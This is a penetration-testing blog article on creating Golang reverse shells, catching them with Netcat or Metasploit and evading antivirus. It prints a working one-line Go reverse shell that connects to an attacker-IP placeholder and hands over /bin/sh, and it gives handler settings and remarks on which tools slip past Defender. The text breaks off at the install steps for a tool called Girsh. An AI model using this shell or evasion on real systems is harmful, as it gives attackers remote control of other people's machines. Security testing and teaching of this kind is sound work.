July 2023 – CYBER ARMS – Computer Security

Introduction

Creating Reverse Shells and bypassing Anti-Virus (AV) with Golang. Using Golang in security has become very popular over the last few years. In this article I want to cover several existing Golang scripts that you can use to create Reverse Shells and possibly even bypass Anti-Virus.

This is part one of a two-part series. We will start our journey looking at a one-line reverse shell in Go, and then cover a couple apps that can generate multiple different shells. This article isn’t about writing custom Go scripts or post exploit – what to do after you get a remote shell. It is simply a quick and dirty overview of some existing Go shellcode for Pentesters and Red Teams.

Swissky’s one-line Go shell is up first. This one-line reverse shell works great against Linux based targets. Next, we will look at Girsh, a menu driven script that can create multiple different reverse shells for both Linux and Windows.

In Part 2, we will look at Go-Shellcode, a very good Go reverse shell. At last testing and with the right payload, still bypasses most common Windows Anti-Virus products.

As always, this Article is for Educational & Informational Purposes Only. Never try to Access Systems that you do not have Permission to do so

I used two Kali Linux VMs for this article, one a target and the other an attack system. Golang was already installed on the attacking system. I also used a Windows 11 system and a Windows Server 2022 (not shown) for testing some of the shells.

Swissky Repo – Payload All the Thing, Golang Shell

Tool GitHub Site: https://github.com/swisskyrepo

Swissky’s Github site has a one-line reverse shell for Golang that works great on Linux. All you need is a Netcat listener set up on the attacker system and then run the one liner on the Linux target.

Just set up a Netcat Listener on the Attacking system:

On the target, take the one line Go payload from Swisskeyrepo¹ and enter the attacker IP address. Then, run in on the target system.

echo ‘package main;import”os/exec”;import”net”;func main(){c,_:=net.Dial(“tcp”,”[Attacker_IP_Address]:4242″);cmd:=exec.Command(“/bin/sh”);cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}’ > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

As seen below:

If the target system has Golang installed, we immediately get a shell:

Before we continue, there are several Go reverse shells available online and on GitHub that basically just open a simple remote communication shell to Netcat. You don’t have to use Netcat on the attacker system, you can use the Metasploit Framework to catch this type of basic shell.

Yes, it also works for Netcat-like shellcode that is compiled to run on Windows targets as well. Granted it won’t be a Meterpreter shell, just a basic shell, but if the target is Windows based you could try the “upgrade shell to meterpreter” module in Metasploit. Windows Defender does catch and block the “upgrade shell to meterpreter” post module, but other AV products may not.

You can learn more about upgrading your shell to meterpreter here – https://docs.metasploit.com/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html

Let’s take a minute and look at catching a basic Netcat shell with Metasploit.

Catching Netcat (Generic) Shells using Metasploit

You can use the Metasploit framework on your attacker system instead of just using Netcat. To do so, just start Metasploit on your attacking system and use a Multi Handler. For a Linux target you will need the “generic/shell_reverse_tcp” payload. Metasploit loads this as default, but I set it manually just to be sure. Then just enter your attacker IP address as LHOST and enter the port used as LPORT. When all is set, just enter “exploit”.

As seen below:

Now, run the one liner Go attack on the target system again. Metasploit acts like Netcat and completes the remote shell.

The process is the same if the target is Windows based, and you are using a Windows version of a Netcat like shell attack. Just change the payload in Multi Handler to the Windows x64 shell.

As seen below:

Notice the only change is switching from the generic shell to the Windows x64 shell. Using the plain reverse shell payloads in Metasploit, you can catch any of the Netcat shells written in any language, and for any target platform.

Girsh – Golang Interactive Reverse Shell vs Linux

Tool Author: nodauf
Tool GitHub: https://github.com/nodauf/Girsh

Girsh is a quick and easy menu driven remote shell written in Golang. Until recently, the PowerShell module in Girsh did bypass Microsoft Defender and other major AV products. Though Defender catches it now, you may still have some luck with it against other AV products. For this example, we will create a quick Linux shell with it.

Install & Usage

With Golang installed all you need to do is pull Girsh down from GitHub.